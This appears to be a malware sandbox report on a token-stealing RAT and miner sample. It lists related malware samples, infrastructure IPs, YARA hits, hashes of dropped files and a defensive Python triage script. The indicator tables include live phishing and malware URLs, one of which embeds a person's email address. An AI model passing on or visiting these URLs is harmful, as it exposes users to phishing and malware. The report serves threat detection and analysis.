lzkaYYrJbB.exe | malicious | AgentTesla
• 208.95.112.1
Teklif-Formu.jar | malicious | STRRAT
• 208.95.112.1
kDCWV8kDTq.exe | malicious | AgentTesla
• 208.95.112.1
ct5MWdiYZC.exe | malicious | AgentTesla
• 208.95.112.1
SecuriteInfo.com.Win32.CrypterX-gen.19037.19274.exe | malicious | AgentTesla, PureLog Stealer
• 208.95.112.1
92x1AqfTUQ.exe | malicious | AgentTesla
• 208.95.112.1
Teklif-Formu.jar | malicious | STRRAT
• 208.95.112.1
TU5V4VyQl3.exe | malicious | AgentTesla
• 208.95.112.1
17152359653a05b96d05ff5bef69786c7326d6262078875016233ef3d21642eb7337464dde415.dat-decoded.exe | malicious | AgentTesla
• 208.95.112.1
Match: raw.githubusercontent.com
file.exe | malicious | LummaC
• 185.199.108.133
Move Mouse.exe | malicious | Unknown
• 185.199.110.133
ByfronExecutor.exe | malicious | Python Stealer, Discord Token Stealer, Empyrean
• 185.199.108.133
https://broken-rain-1a74.1rwvvy66.workers.dev/ | malicious | HTMLPhisher
• 185.199.109.133
8PiY5IvjhI.exe | malicious | Quasar
• 185.199.109.133
https://broken-rain-1a74.1rwvvy66.workers.dev/ | malicious | HTMLPhisher
• 185.199.108.133
https://broken-rain-1a74.1rwvvy66.workers.dev/ | malicious | HTMLPhisher
• 185.199.109.133
https://broken-rain-1a74.1rwvvy66.workers.dev/ | malicious | HTMLPhisher
• 185.199.111.133
SecuriteInfo.com.Win64.DropperX-gen.15585.25265.exe | malicious | XWorm
• 185.199.111.133
eqmq0pcp.yew(1).exe | malicious | Xmrig
• 185.199.111.133
Match: api.telegram.org
lzkaYYrJbB.exe | malicious | AgentTesla
• 149.154.167.220
MNhTlD222T.exe | malicious | AgentTesla, PureLog Stealer
• 149.154.167.220
ORDER_INQUIRY_PDF.exe | malicious | AgentTesla
• 149.154.167.220
rREQUESTFORQUOTATION2024.scr.exe | malicious | AgentTesla
• 149.154.167.220
SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exe | malicious | AgentTesla, PureLog Stealer
• 149.154.167.220
Se7CZnlXZZ.exe | malicious | AgentTesla, PureLog Stealer, zgRAT
• 149.154.167.220
vjk2FB3esY.exe | malicious | AgentTesla, PureLog Stealer
• 149.154.167.220
COMPANY PROFILE_pdf.exe | malicious | AgentTesla
• 149.154.167.220
kzRQODdshQ.exe | malicious | AgentTesla, PureLog Stealer
• 149.154.167.220
TRANSFER_PURCHASE ORDER 02052024.exe | malicious | AgentTesla
• 149.154.167.220
Match: TELEGRAMRU
Associated Sample Name / URL | Detection | Threat Name | Context
lzkaYYrJbB.exe | malicious | AgentTesla | 149.154.167.220
MNhTlD222T.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
4Qkny6GqTM.exe | malicious | Keygroup | 149.154.167.99
ORDER_INQUIRY_PDF.exe | malicious | AgentTesla | 149.154.167.220
rREQUESTFORQUOTATION2024.scr.exe | malicious | AgentTesla | 149.154.167.220
SecuriteInfo.com.Trojan.DownLoader16.37524.18705.18225.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
Se7CZnlXZZ.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
vjk2FB3esY.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
COMPANY PROFILE_pdf.exe | malicious | AgentTesla | 149.154.167.220
kzRQODdshQ.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://qrco.de/WntxebLzUZRPvkbE7lS0v1K3POsozeEK | malicious | Unknown | 162.247.243.29
https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:446a8aa0-0ddf-4503-b329-6e498319961b | malicious | HTMLPhisher | 172.64.155.179
stub.exe | malicious | Unknown | 172.67.74.152
z43ISFFORMHBLDRAFTTHBL53164US7272Coscoline.exe | malicious | GuLoader, Remcos | 172.67.215.46
stub.exe | malicious | Unknown | 172.67.74.152
https://cloudflare-ipfs.com/ipfs/bafkreiergbvqfr2ginrzh2334lrj2b5kcx5e6rbx2h6qovn34u2mcyb6xy | malicious | Unknown | 104.17.25.14
https://app.asana.com/app/asana/-/log?dest=https%3A%2F%2Fapp.asana.com%2F-%2Fmobile_web_email_login%3Fwa%3D127821c9468d9061b22a0dcde981af4a%26e%3Dbfanguy%2540uscortec.com&se=%7B%22name%22%3A%22AsanaLoaded%22%2C%22action%22%3A%22AsanaLoaded%22%2C%22sub_action%22%3A%22MagicLogin%22%2C%22location%22%3A%22MagicLoginEmail%22%2C%22domain%22%3Anull%2C%22domain_user%22%3Anull%2C%22user%22%3A1195607135831890%2C%22from_amp_email%22%3Afalse%2C%22non_user_action_event%22%3Afalse%2C%22email_uuid%22%3A%221715188399672Idf6803-3d26De4-a3ff3e4e9b9ccd%22%2C%22app_name%22%3A%22email%22%7D&rp=1195607135831890&hash=55999a967007d54aa7f5ae7781466d3ecff5abdb4784c581e8491f53c210d547 | malicious | Unknown | 104.16.51.111
https://pub-5485e1bc9582400ab32d39cdd4221a65.r2.dev/link.html | malicious | HTMLPhisher | 104.17.2.184
8PCVwdtb1O.exe | malicious | Unknown | 104.26.13.205
8PCVwdtb1O.exe | malicious | Unknown | 104.26.12.205
Match: TUT-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
Z5l5CNjOJL.exe | malicious | AgentTesla | 208.95.112.1
lzkaYYrJbB.exe | malicious | AgentTesla | 208.95.112.1
Teklif-Formu.jar | malicious | STRRAT | 208.95.112.1
kDCWV8kDTq.exe | malicious | AgentTesla | 208.95.112.1
ct5MWdiYZC.exe | malicious | AgentTesla | 208.95.112.1
SecuriteInfo.com.Win32.CrypterX-gen.19037.19274.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
92x1AqfTUQ.exe | malicious | AgentTesla | 208.95.112.1
Teklif-Formu.jar | malicious | STRRAT | 208.95.112.1
TU5V4VyQl3.exe | malicious | AgentTesla | 208.95.112.1
17152359653a05b96d05ff5bef69786c7326d6262078875016233ef3d21642eb7337464dde415.dat-decoded.exe | malicious | AgentTesla | 208.95.112.1
Match: FASTLYUS
Associated Sample Name / URL | Detection | Threat Name | Context
https://qrco.de/WntxebLzUZRPvkbE7lS0v1K3POsozeEK | malicious | Unknown | 151.101.2.133
https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:446a8aa0-0ddf-4503-b329-6e498319961b | malicious | HTMLPhisher | 151.101.1.138
https://app.asana.com/app/asana/-/log?dest=https%3A%2F%2Fapp.asana.com%2F-%2Fmobile_web_email_login%3Fwa%3D127821c9468d9061b22a0dcde981af4a%26e%3Dbfanguy%2540uscortec.com&se=%7B%22name%22%3A%22AsanaLoaded%22%2C%22action%22%3A%22AsanaLoaded%22%2C%22sub_action%22%3A%22MagicLogin%22%2C%22location%22%3A%22MagicLoginEmail%22%2C%22domain%22%3Anull%2C%22domain_user%22%3Anull%2C%22user%22%3A1195607135831890%2C%22from_amp_email%22%3Afalse%2C%22non_user_action_event%22%3Afalse%2C%22email_uuid%22%3A%221715188399672Idf6803-3d26De4-a3ff3e4e9b9ccd%22%2C%22app_name%22%3A%22email%22%7D&rp=1195607135831890&hash=55999a967007d54aa7f5ae7781466d3ecff5abdb4784c581e8491f53c210d547 | malicious | Unknown | 151.101.1.187
https://pub-5485e1bc9582400ab32d39cdd4221a65.r2.dev/link.html | malicious | HTMLPhisher | 151.101.130.137
https://flow.page/afalcondocs | malicious | Unknown | 151.101.196.159
https://lookerstudio.google.com/reporting/2e73521b-7499-4933-b0bb-3deae3109277/page/aRYzD | malicious | HTMLPhisher | 151.101.194.137
IMG202404040007.jar | malicious | STRRAT | 199.232.192.209
IMG202404040007.jar | malicious | STRRAT | 199.232.192.209
http://links.spmail2.legacy.com/ctt?m=3001287&r=LTI0MDEwNTg0MjYS1&b=0&j=NDQzMTI5MDcyS0&mt=1&kt=12&kx=1&k=Funeral%2520Home&kd=https://refrigeracaolucas.com.br/main/RTRUA/UA/ZGlyay5kb25hdGhAbGNhdHRlcnRvbi5jb20K/%23RTR/RTR | malicious | HTMLPhisher | 151.101.2.137
https://app.rule.io/browser/campaign/c/n_doqy | malicious | Phisher | 151.101.1.195
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Mars Stealer, PrivateLoader, PureLog Stealer, Stealc, Vidar, zgRAT | 185.199.108.133
stub.exe | malicious | Unknown | 185.199.108.133
8PCVwdtb1O.exe | malicious | Unknown | 185.199.108.133
8PCVwdtb1O.exe | malicious | Unknown | 185.199.108.133
wR0kjT941k.exe | malicious | AgentTesla, PureLog Stealer | 185.199.108.133
5Of8ZuGExZ.exe | malicious | AgentTesla | 185.199.108.133
Z5l5CNjOJL.exe | malicious | AgentTesla | 185.199.108.133
5p3Hx8XIQO.exe | malicious | AgentTesla | 185.199.108.133
lzkaYYrJbB.exe | malicious | AgentTesla | 185.199.108.133
qGw9V1CTJj.exe | malicious | AgentTesla, PureLog Stealer | 185.199.108.133
Match: C:\ProgramData\setup.exe
Associated Sample Name / URL | Detection | Threat Name
hacn.exe | malicious | Discord Token Stealer, Millenuim RAT, Xmrig

Match: C:\Program Files\Google\Chrome\updater.exe
Associated Sample Name / URL | Detection | Threat Name
hacn.exe | malicious | Discord Token Stealer, Millenuim RAT, Xmrig
Process: C:\ProgramData\setup.exe
File Type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 5617152
Entropy (8bit): 7.71585644239634
Encrypted: false
SSDEEP: 98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5: 1274CBCD6329098F79A3BE6D76AB8B97
SHA1: 53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256: BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512: A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:
• Filename: hacn.exe, Detection: malicious
                                                                                                                                                          Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 7242457
Entropy (8bit): 7.992260600803165
Encrypted: true
SSDEEP: 98304:/ro9DjWM8JEE1rRlamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRGYKJJcGhE+:/ro90KeNTfm/pf+xk4dWRGtrbWOjgWyU
MD5: A71FC3CA1BD1AF148EE4C1BFABCBE0DA
SHA1: BBAF078956D577D05AB1CAC41CC530C1E780478D
SHA-256: 4F9F2637C579B3C01C0031926BD29D3774D4D9435D70E8C7C2D17AEBA81E2441
SHA-512: EE4EE30004404A10DA6EB1C468DF1F905BD20ED4B9139E477563EB998243764F7A54D20E7980B029A3B28D4774B695B8EB21D143C1CDB6FD7401CC001C863F35
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d...".;f.........."....&.....v......@..........@......................................n...`.....................................................x....p.......0...#...^n.H$......X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X............"..............@..B........................................................................................................................................................................................
Process: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 25152315
Entropy (8bit): 7.999194335744512
Encrypted: true
SSDEEP: 393216:IDfDoc6/4m7/VBPt2XP8b/B+6M+8TIZ/iy1K4yoJq1HmnlOUyv5fkpHwsX:Ib7QvBt2XP8DB+DlSJ1K4y5PhSQ
MD5: B9F3E6E06F33EE7078F514D41BE5FAAD
SHA1: E2D35BC333EC6FF0F6AE60E55DACA44A433FC279
SHA-256: A7C3208CF3067D1DA12542CAB16516C9085620959DEB60DD000E190F15C74758
SHA-512: 212A6540082A20DE6798D53E2C6F7F5705E5E4164620AA7F08A366E747F240C59C4C70CE0B8DD00625A0A960D1615073B4E48B2707ABE767B422F732C5927BED
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....];f.........."....%.....p.................@..........................................`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5872344
                                                                                                                                                          Entropy (8bit):7.487098820179109
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
                                                                                                                                                          MD5:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                                                                                          SHA1:5E980079F67215BF69B8C1C16B56F40BF4A29958
                                                                                                                                                          SHA-256:E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
                                                                                                                                                          SHA-512:8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(....*..(....*..{....*"..}....*..*F.{....o....s....*...2...{....o..../..{.....o....*.s,...*...(....,.(........2...{....o....2..{.....o....*.{......o....*..s,...*v..(....,.(.......{.....o....*2.{....o....*...2...{....o....2..*.{.....o.....{.....o....*>.{.....o....&.*..0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5617152
                                                                                                                                                          Entropy (8bit):7.71585644239634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                                                                                          MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                                          SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                                                                                          SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                                                                                          SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                          Joe Sandbox View:
• Filename: hacn.exe, Detection: malicious
                                                                                                                                                          Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe
                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12576970
                                                                                                                                                          Entropy (8bit):7.995050972613473
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:196608:HWweM4sJFPpGAjMGhuPD5U4iDfyGgVwBdnpkYRMoSENsS3Mcj0kilsl:0SP8AxYDMDfDgVc6J4pMcj9Wsl
                                                                                                                                                          MD5:48B277A9AC4E729F9262DD9F7055C422
                                                                                                                                                          SHA1:D7E8A3FA664E863243C967520897E692E67C5725
                                                                                                                                                          SHA-256:5C832EDA59809A4F51DC779BB00BD964AAD42F2597A1C9F935CFB37F0888EF17
                                                                                                                                                          SHA-512:66DD4D1A82103CD90C113DF21EB693A2BFFDE2CDE41F9F40B5B85368D5A920B66C3BC5CADAF9F9D74DFD0F499086BEDD477F593184A7F755B7B210EF5E428941
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-................,..............................................Rich...................PE..d...5L;f.........."....&.....r......0..........@....................................dy....`.....................................................x....p..e....0...#..............X...@...................................@............... ............................text............................... ..`.rdata...........0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc...e....p......................@..@.reloc..X...........................@..B................................................................................................................................................................................................
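The "File Type", "Entropy" and "Encrypted" fields of the dropped-file records above are all derived from the file bytes: the preview's "PE..L" versus "PE..d" is the low byte of the COFF Machine field (0x14C for Intel 80386, 0x8664 for x86-64), the ".Net assembly" tag comes from a populated CLR data-directory entry, and the two drops with entropy above 7.99 bits/byte are the ones flagged Encrypted:true while 7.92 and below are not. The script below is an added example, not Joe Sandbox code, that recomputes those fields for any file; the PE constants are from the PE/COFF specification, the 7.95 cut-off is an assumption chosen only to reproduce the verdicts in this report, and the sample images are constructed header-only stubs rather than real drops.

```python
"""Triage of dropped PE files: hashes, entropy-based Encrypted flag and a file(1)-style
type string from the PE header. Added example for this report, not Joe Sandbox code."""
import hashlib
import math
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR (.NET) header slot in the data directory
# Assumption: the report flags 7.995 as Encrypted:true and 7.924 as false, so any
# cut-off between them reproduces its verdicts; the real rule is not published here.
ENCRYPTED_THRESHOLD = 7.95


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_info(data: bytes):
    """Parse DOS, COFF and optional headers; return a dict, or None if not a PE image."""
    try:
        if data[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        coff = e_lfanew + 4
        machine, _nsec, _ts, _sym, _nsym, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
        opt = coff + 20
        magic = struct.unpack_from("<H", data, opt)[0]
        if magic == 0x10B:      # PE32: NumberOfRvaAndSizes at +92, DataDirectory at +96
            pe32plus, rva_count_off, dirs_off = False, opt + 92, opt + 96
        elif magic == 0x20B:    # PE32+: NumberOfRvaAndSizes at +108, DataDirectory at +112
            pe32plus, rva_count_off, dirs_off = True, opt + 108, opt + 112
        else:
            return None
        subsystem = struct.unpack_from("<H", data, opt + 68)[0]   # same offset in both formats
        n_dirs = struct.unpack_from("<I", data, rva_count_off)[0]
        is_dotnet = False
        if n_dirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
            rva, size = struct.unpack_from("<II", data, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
            is_dotnet = rva != 0 and size != 0   # non-empty CLR header => managed assembly
    except struct.error:
        return None   # truncated header
    return {"machine": machine, "pe32plus": pe32plus, "subsystem": subsystem,
            "dll": bool(chars & IMAGE_FILE_DLL), "is_dotnet": is_dotnet}


def file_type(info) -> str:
    """Render the header facts in the wording the report uses ('PE32+ executable (GUI) x86-64 ...')."""
    if info is None:
        return "data"
    fmt = "PE32+" if info["pe32plus"] else "PE32"
    kind = "(DLL) " if info["dll"] else ""
    sub = {2: "GUI", 3: "console"}.get(info["subsystem"], f"subsystem {info['subsystem']}")
    arch = {IMAGE_FILE_MACHINE_I386: "Intel 80386", IMAGE_FILE_MACHINE_AMD64: "x86-64"}.get(
        info["machine"], hex(info["machine"]))
    dotnet = " Mono/.Net assembly" if info["is_dotnet"] else ""
    return f"{fmt} executable {kind}({sub}) {arch}{dotnet}, for MS Windows"


def triage(data: bytes) -> dict:
    """Everything a dropped-file record needs: size, hashes, entropy, Encrypted flag, type."""
    ent = shannon_entropy(data)
    return {"size": len(data),
            "md5": hashlib.md5(data).hexdigest().upper(),
            "sha1": hashlib.sha1(data).hexdigest().upper(),
            "sha256": hashlib.sha256(data).hexdigest().upper(),
            "entropy": ent,
            "encrypted": ent >= ENCRYPTED_THRESHOLD,
            "file_type": file_type(pe_info(data))}


def build_sample_pe(machine: int, subsystem: int = 2, dotnet: bool = False, dll: bool = False) -> bytes:
    """Constructed sample: a header-only PE image (not loadable), enough for pe_info()."""
    pe32plus = machine == IMAGE_FILE_MACHINE_AMD64
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    chars = 0x0002 | (IMAGE_FILE_DLL if dll else 0)                     # EXECUTABLE_IMAGE [| DLL]
    n_dirs = 16
    opt_size = (112 if pe32plus else 96) + 8 * n_dirs
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, subsystem)
    struct.pack_into("<I", opt, 108 if pe32plus else 92, n_dirs)
    if dotnet:   # fake CLR header RVA/size so the COM descriptor entry is non-empty
        struct.pack_into("<II", opt, (112 if pe32plus else 96) + 8 * 14, 0x2008, 0x48)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for sample in (build_sample_pe(IMAGE_FILE_MACHINE_AMD64),
                   build_sample_pe(IMAGE_FILE_MACHINE_I386, dotnet=True),
                   bytes(range(256)) * 16):            # uniform bytes: entropy exactly 8.0
        print(triage(sample))
```

Run `triage(open(path, "rb").read())` on a real drop to compare against the record; a PyInstaller bundle such as the s.exe/Build.exe drops above will come out near 8.0 because its payload is zlib-compressed, so the Encrypted flag means "compressed or encrypted", not that a cipher was confirmed.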
                                                                                                                                                          Process:C:\Users\user\Desktop\DevxExecutor.exe
                                                                                                                                                          File Type:CSV text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):654
                                                                                                                                                          Entropy (8bit):5.380476433908377
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                          Process:C:\ProgramData\main.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1678
                                                                                                                                                          Entropy (8bit):5.369913341429046
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:MxHKQwYHKGSI6ogLHitHTHhAHKKkyHpHNp51qHGIs0HKD:iqbYqGSI6ogLCtzHeqKkyJtp5wmj0qD
                                                                                                                                                          MD5:47EF549ED9A6077539E2B7E16049BF8F
                                                                                                                                                          SHA1:2129E12D767465A7F083AB906EB481DB88B47D0E
                                                                                                                                                          SHA-256:ABACC0BCEB0B100C7FDC2DDDF3CDDCCB8C048466FD886D0A015AB49D5B0A38A7
                                                                                                                                                          SHA-512:EB77CA4097CD1F268E6462D7FA3F864700B7113A637C755FCFF843A01DE6088A7B3588D2CFD1C6C9F018E93783019E338793E7EC5FC29BDBCE6E6604AEB91A99
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKey
